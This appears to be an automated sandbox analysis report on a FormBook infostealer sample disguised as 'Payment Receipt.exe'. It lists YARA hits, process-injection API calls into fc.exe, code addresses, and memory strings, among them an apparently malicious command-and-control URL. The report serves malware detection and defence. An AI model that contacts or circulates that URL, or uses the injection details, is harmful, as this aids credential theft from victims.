              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000005.00000002.4097379677.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000005.00000003.2192052274.00000000079BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fc.exe, 00000005.00000002.4098630415.0000000004B0A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000005.00000002.4100552512.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.00000000041AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: fc.exe, 00000005.00000002.4098630415.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.000000000433C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThM

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.Payment Receipt.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: Payment Receipt.exe
              Sample has a suspicious name (potential lure to open the executable)
              Source: Payment Receipt.exeStatic file information: Suspicious name
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0075CB43 NtClose,0_2_0075CB43
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2B60 NtClose,LdrInitializeThunk,0_2_015E2B60
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_015E2DF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_015E2C70
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E35C0 NtCreateMutant,LdrInitializeThunk,0_2_015E35C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E4340 NtSetContextThread,0_2_015E4340
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E4650 NtSuspendThread,0_2_015E4650
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2BF0 NtAllocateVirtualMemory,0_2_015E2BF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2BE0 NtQueryValueKey,0_2_015E2BE0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2B80 NtQueryInformationFile,0_2_015E2B80
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2BA0 NtEnumerateValueKey,0_2_015E2BA0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2AD0 NtReadFile,0_2_015E2AD0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2AF0 NtWriteFile,0_2_015E2AF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2AB0 NtWaitForSingleObject,0_2_015E2AB0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2D10 NtMapViewOfSection,0_2_015E2D10
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2D00 NtSetInformationFile,0_2_015E2D00
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2D30 NtUnmapViewOfSection,0_2_015E2D30
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2DD0 NtDelayExecution,0_2_015E2DD0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2DB0 NtEnumerateKey,0_2_015E2DB0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2C60 NtCreateKey,0_2_015E2C60
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2C00 NtQueryInformationProcess,0_2_015E2C00
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2CC0 NtQueryVirtualMemory,0_2_015E2CC0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2CF0 NtOpenProcess,0_2_015E2CF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2CA0 NtQueryInformationToken,0_2_015E2CA0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2F60 NtCreateProcessEx,0_2_015E2F60
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2F30 NtCreateSection,0_2_015E2F30
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2FE0 NtCreateFile,0_2_015E2FE0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2F90 NtProtectVirtualMemory,0_2_015E2F90
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2FB0 NtResumeThread,0_2_015E2FB0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2FA0 NtQuerySection,0_2_015E2FA0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2E30 NtWriteVirtualMemory,0_2_015E2E30
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2EE0 NtQueueApcThread,0_2_015E2EE0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2E80 NtReadVirtualMemory,0_2_015E2E80
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E2EA0 NtAdjustPrivilegesToken,0_2_015E2EA0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E3010 NtOpenDirectoryObject,0_2_015E3010
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E3090 NtSetValueKey,0_2_015E3090
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E39B0 NtGetContextThread,0_2_015E39B0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E3D70 NtOpenThread,0_2_015E3D70
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E3D10 NtOpenProcessToken,0_2_015E3D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03024340 NtSetContextThread,LdrInitializeThunk,5_2_03024340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03024650 NtSuspendThread,LdrInitializeThunk,5_2_03024650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022B60 NtClose,LdrInitializeThunk,5_2_03022B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03022BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03022BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03022BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022AD0 NtReadFile,LdrInitializeThunk,5_2_03022AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022AF0 NtWriteFile,LdrInitializeThunk,5_2_03022AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022F30 NtCreateSection,LdrInitializeThunk,5_2_03022F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022FB0 NtResumeThread,LdrInitializeThunk,5_2_03022FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022FE0 NtCreateFile,LdrInitializeThunk,5_2_03022FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03022E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03022EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03022D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03022D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022DD0 NtDelayExecution,LdrInitializeThunk,5_2_03022DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03022DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022C60 NtCreateKey,LdrInitializeThunk,5_2_03022C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03022C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03022CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030235C0 NtCreateMutant,LdrInitializeThunk,5_2_030235C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030239B0 NtGetContextThread,LdrInitializeThunk,5_2_030239B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022B80 NtQueryInformationFile,5_2_03022B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022AB0 NtWaitForSingleObject,5_2_03022AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022F60 NtCreateProcessEx,5_2_03022F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022F90 NtProtectVirtualMemory,5_2_03022F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022FA0 NtQuerySection,5_2_03022FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022E30 NtWriteVirtualMemory,5_2_03022E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022EA0 NtAdjustPrivilegesToken,5_2_03022EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022D00 NtSetInformationFile,5_2_03022D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022DB0 NtEnumerateKey,5_2_03022DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022C00 NtQueryInformationProcess,5_2_03022C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022CC0 NtQueryVirtualMemory,5_2_03022CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03022CF0 NtOpenProcess,5_2_03022CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03023010 NtOpenDirectoryObject,5_2_03023010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03023090 NtSetValueKey,5_2_03023090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03023D10 NtOpenProcessToken,5_2_03023D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03023D70 NtOpenThread,5_2_03023D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_008293B0 NtCreateFile,5_2_008293B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_00829520 NtReadFile,5_2_00829520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_008296B0 NtClose,5_2_008296B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_00829610 NtDeleteFile,5_2_00829610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_00829820 NtAllocateVirtualMemory,5_2_00829820
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00748B130_2_00748B13
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00731B8B0_2_00731B8B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_007310000_2_00731000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_007328C00_2_007328C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0075F1630_2_0075F163
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_007332050_2_00733205
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_007312800_2_00731280
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_007403130_2_00740313
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00731BEB0_2_00731BEB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_007405330_2_00740533
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0073E5130_2_0073E513
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0073E5120_2_0073E512
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00746D130_2_00746D13
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00746D0E0_2_00746D0E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0073467A0_2_0073467A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0073E6630_2_0073E663
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0073E6570_2_0073E657
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016381580_2_01638158
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A01000_2_015A0100
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164A1180_2_0164A118
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016681CC0_2_016681CC
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016641A20_2_016641A2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016701AA0_2_016701AA
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016420000_2_01642000
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166A3520_2_0166A352
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016703E60_2_016703E6
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BE3F00_2_015BE3F0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016502740_2_01650274
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016302C00_2_016302C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B05350_2_015B0535
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016705910_2_01670591
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016624460_2_01662446
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016544200_2_01654420
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165E4F60_2_0165E4F6
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D47500_2_015D4750
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B07700_2_015B0770
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AC7C00_2_015AC7C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CC6E00_2_015CC6E0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C69620_2_015C6962
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0167A9A60_2_0167A9A6
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B29A00_2_015B29A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BA8400_2_015BA840
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B28400_2_015B2840
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE8F00_2_015DE8F0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015968B80_2_015968B8
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166AB400_2_0166AB40
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01666BD70_2_01666BD7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AEA800_2_015AEA80
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BAD000_2_015BAD00
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164CD1F0_2_0164CD1F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015AADE00_2_015AADE0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C8DBF0_2_015C8DBF
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0C000_2_015B0C00
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A0CF20_2_015A0CF2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01650CB50_2_01650CB5
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01624F400_2_01624F40
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01652F300_2_01652F30
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D0F300_2_015D0F30
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015F2F280_2_015F2F28
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A2FC80_2_015A2FC8
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0162EFA00_2_0162EFA0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B0E590_2_015B0E59
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166EE260_2_0166EE26
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166EEDB0_2_0166EEDB
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C2E900_2_015C2E90
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166CE930_2_0166CE93
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0167B16B0_2_0167B16B
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159F1720_2_0159F172
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E516C0_2_015E516C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015BB1B00_2_015BB1B0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166F0E00_2_0166F0E0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016670E90_2_016670E9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B70C00_2_015B70C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165F0CC0_2_0165F0CC
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0159D34C0_2_0159D34C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166132D0_2_0166132D
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015F739A0_2_015F739A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016512ED0_2_016512ED
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CB2C00_2_015CB2C0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CD2F00_2_015CD2F0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B52A00_2_015B52A0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016675710_2_01667571
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016795C30_2_016795C3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164D5B00_2_0164D5B0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A14600_2_015A1460
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166F43F0_2_0166F43F
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166F7B00_2_0166F7B0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015F56300_2_015F5630
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016616CC0_2_016616CC
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B99500_2_015B9950
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CB9500_2_015CB950
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016459100_2_01645910
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0161D8000_2_0161D800
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B38E00_2_015B38E0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166FB760_2_0166FB76
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01625BF00_2_01625BF0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015EDBF90_2_015EDBF9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CFB800_2_015CFB80
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01623A6C0_2_01623A6C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01667A460_2_01667A46
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166FA490_2_0166FA49
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0165DAC60_2_0165DAC6
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01651AA30_2_01651AA3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0164DAAC0_2_0164DAAC
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015F5AA00_2_015F5AA0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01667D730_2_01667D73
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B3D400_2_015B3D40
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01661D5A0_2_01661D5A
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CFDC00_2_015CFDC0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01629C320_2_01629C32
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166FCF20_2_0166FCF2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166FF090_2_0166FF09
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01573FD50_2_01573FD5
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01573FD20_2_01573FD2
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B1F920_2_015B1F92
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0166FFB10_2_0166FFB1
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015B9EB00_2_015B9EB0
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D4234_2_0322D423
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_03237A364_2_03237A36
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322F27C4_2_0322F27C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0324E0CC4_2_0324E0CC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_032235E34_2_032235E3
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D5CC4_2_0322D5CC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_03235C774_2_03235C77
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D47B4_2_0322D47B
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D47C4_2_0322D47C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_03235C7C4_2_03235C7C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D4804_2_0322D480
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322F49C4_2_0322F49C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AA3525_2_030AA352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030B03E65_2_030B03E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FFE3F05_2_02FFE3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030902745_2_03090274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030702C05_2_030702C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0308A1185_2_0308A118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030781585_2_03078158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030B01AA5_2_030B01AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A41A25_2_030A41A2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A81CC5_2_030A81CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030820005_2_03082000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE01005_2_02FE0100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030147505_2_03014750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FEC7C05_2_02FEC7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF07705_2_02FF0770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300C6E05_2_0300C6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030B05915_2_030B0591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030944205_2_03094420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A24465_2_030A2446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF05355_2_02FF0535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0309E4F65_2_0309E4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AAB405_2_030AAB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FEEA805_2_02FEEA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A6BD75_2_030A6BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FD68B85_2_02FD68B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030069625_2_03006962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030BA9A65_2_030BA9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF28405_2_02FF2840
